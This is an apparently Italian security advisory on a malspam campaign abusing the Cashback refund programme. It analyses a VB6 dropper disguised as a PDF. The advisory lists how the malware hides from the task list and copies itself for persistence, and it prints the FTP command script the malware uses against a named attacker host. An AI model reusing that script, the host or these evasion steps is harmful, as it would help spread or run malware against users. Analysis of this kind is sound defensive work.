È stata rilevata da D3Lab una campagna malspam volta a veicolare un malware, nascondendosi dietro al programma di rimborso in denaro per acquisti effettuati con strumenti di pagamento elettronici, meglio noto come Cashback
Il file scaricato non è un documento pdf come riportato nel link, ma si tratta di un file eseguibile scritto in Visual Basic 6 con doppia estensione.
Si riportano di seguito le operazioni eseguite dal malware:
- Acquisisce informazioni sul nome utente e sul nome macchina e li concatena usando un trattino;
- Verifica la presenza di “C:\Users” o “C:\Documents and settings” usando la data di creazione della cartella;
- Nasconde la finestra dall’elenco delle applicazione usando
Global.TaskVisible = False
; - Verifica se esiste già una istanza attiva con
Global.PrevInstance
; - Genera un file in “C:\User\USERNAME\win1.ini” all’interno del quale scrive il percorso da cui è stato lanciato il malware. Lo userà per rimuoverlo;
- Se il file eseguibile non è denominato “sysc32cmd” o “sysc32log” effettua una copia di se stesso in C:\User\USERNAME\sysC32cmd.exe;
Il file sorgente è generato usando il nome dell’applicazione così come ottenuto tramite l’oggettoApp
. Non contiene quindi l’estensione, viene prima provata l’estensione .exe e poi .scr. - Genera dei file di testo rinominati in .dll contenenti le istruzioni telnet per collegarsi in FTP;
ccc1.dll
open ffaadd332211.altervista.org username password ASCII lcd "C:\Users\USERNAME" get "USERNAME-PC-USERNAME" del "USERNAME-PC-USERNAME" bye
L’host e le credenziali sono riportate in chiaro all’interno del codice del malware.
Il malware è piuttosto rudimentale, manca di un C2 vero e proprio ed utilizza un linguaggio obsoleto.
La necessità di firmare le proprie opere è probabilmente indice di una mano ancora inesperta o comunque non professionista, che vuole farsi conoscere per il risultato ottenuto.